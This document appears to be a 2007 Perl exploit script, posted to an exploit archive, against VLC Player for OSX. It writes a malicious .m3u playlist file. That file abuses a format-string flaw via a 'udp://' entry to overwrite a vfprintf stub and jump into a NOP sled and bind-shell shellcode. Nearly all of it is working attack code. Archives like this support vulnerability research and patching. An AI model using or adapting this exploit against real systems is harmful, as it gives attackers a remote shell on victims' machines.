VLCMediaSlayer-x86.pl.txt
Posted on 04 January 2007
#!/usr/bin/perl # # http://www.digitalmunition.com/VLCMediaSlayer-x86.pl # Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com # # This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code. # $outfile = "pwnage.m3u"; $bindshell = "x6ax42x58xcdx80x6ax61x58x99x52x68x10x02x11x5cx89" . "xe1x52x42x52x42x52x6ax10xcdx80x99x93x51x53x52x6a" . "x68x58xcdx80xb0x6axcdx80x52x53x52xb0x1excdx80x97" . "x6ax02x59x6ax5ax58x51x57x51xcdx80x49x0fx89xf1xff" . "xffxffx50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50" . "x54x54x53x53xb0x3bxcdx80"; # MALLOC 02800000-03008000 [ 8224K] rw-/rwx SM=COW ...e_0x1300000 # Pattern found @ 0x298589e # Pattern found @ 0x298ba92 $jmpaddr = 0x41424344; $lo = ($jmpaddr >> 0) & 0xffff; $hi = ($jmpaddr >> 16) & 0xffff; printf "jump address is: 0x%x%x ", $hi, $lo; $format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" . ($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ; $writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf> printf "writing to file: %s ", $outfile; open(PWNED,">$outfile"); print PWNED "#EXTM3U " . "#EXTINF:0,1-07 " . "x90" x 50 . $bindshell . " " . "udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) . $format . "i" x (999 - length("Can't get file status for ") ) . " "; close(PWNED);
